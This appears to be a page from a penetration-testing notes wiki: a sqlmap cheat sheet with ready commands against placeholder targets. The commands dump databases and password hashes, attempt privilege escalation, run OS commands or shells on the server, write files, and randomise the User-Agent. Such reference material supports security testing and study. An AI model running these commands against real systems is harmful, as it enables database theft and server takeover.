SQLmap

sqlmap goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.

Dumping tables

Examples

Target the http://target.server.com URL using the -u flag:

sqlmap -u 'http://target.server.com'

Specify POST requests by specifying the -data flag:

sqlmap -u "http://10.10.155.76/login.php" -method "POST" -data "log_email=cun@gmail.com&log_password=123456&login_button=Login" --dbs

Target a vulnerable parameter in an authenticated session by specifying cookies using the -cookie flag:

sqlmap -u 'http://target.server.com' --cookie='JSESSIONID=09h76qoWC559GH1K7D- SQHx'

Drop all Set-Cookie requests from the target web server using the -drop-set-cookie flag:

sqlmap -u 'http://target.server.com' -r req.txt --drop-set-cookie

Perform in-depth and risky attacks using the -level and -risk flags:

sqlmap -u 'http://target.server.com' --data='param1=blah' --level=5 --risk=3

Specify which POST or GET parameter to target using the -p flag:

sqlmap -u 'http://target.server.com' --data='param1=blah&param2=blah' -p param1

Choose a random User-Agent request header using the –random-agent flag:

sqlmap -u 'http://target.server.com' -r req.txt --random-agent

Target a certain database service using the –dbms flag:

sqlmap -u 'http://target.server.com' -r req.txt --dbms Oracle

Read a request (stored via Burpsuite) target the user parameter (and no other parameters), run risky queries, and dump users and passwords:

sqlmap -r ./req.txt -p user --level=1 --risk=3 --passwords

Attempt privilege escalation on the target database

sqlmap -r ./req.txt --level=1 --risk=3 --privesc
Run the “whoami” command on the target server.
sqlmap -r ./req.txt --level=1 --risk=3 --os-cmd=whoami

Dump everything in the database, but wait one second in-between requests.

sqlmap -r ./req.txt --level=1 --risk=3 --dump --delay=1

Post-Exploit

Error-Based SQLi, dump all data from a MSSQL Database :

sqlmap -r req --technique=E -U <user> --level 5 --risk 3 --tamper=space2comment --dbms=MSSQL -D <db> --dump

Flags

Here are some useful options for your pillaging pleasure:

-r req.txt Specify a request stored in a text file, great for saved requests from BurpSuite.

--force-ssl Force SQLmap to use SSL or TLS for its requests.

--level=1 only test against the specified parameter, ignore all others.

--risk=3 Run all exploit attempts, even the dangerous ones (could damage database).

--delay Set a delay in-between requests, great for throttled connections.

--proxy Set to http://127.0.0.1:8080 to pipe requests through BurpSuite for inspection.

--privesc Attempt to elevate the privileges of the database service account.

--all Enumerate everything inside the target database.

--hostname Print the target database’s hostname.

--passwords Find and exfiltrate all users and their password hashes or digests.

--dbs Enumerate all databases accessible via the target webserver.

--comments Enumerate all found comments inside the database.

--sql-shell Return a SQL prompt for interaction.

--os-cmd Attempt to execute a system command.

--os-shell Attempt to return a command prompt or terminal for interaction.

--reg-read Read the specified Windows registry key value.

--file-write Specify a local file to be written to the target server.

--file-dest Specify the remote destination to write a file to.

--technique= Specify a letter or letters of BEUSTQ to control the exploit attempts:

B : Boolean-based blind
E : Error-based
U : Union query-based
S : Stacked queries
T : Time-based blind
Q : Inline queries

PreviousSQLi NextNoSQLi

Last updated 1 year ago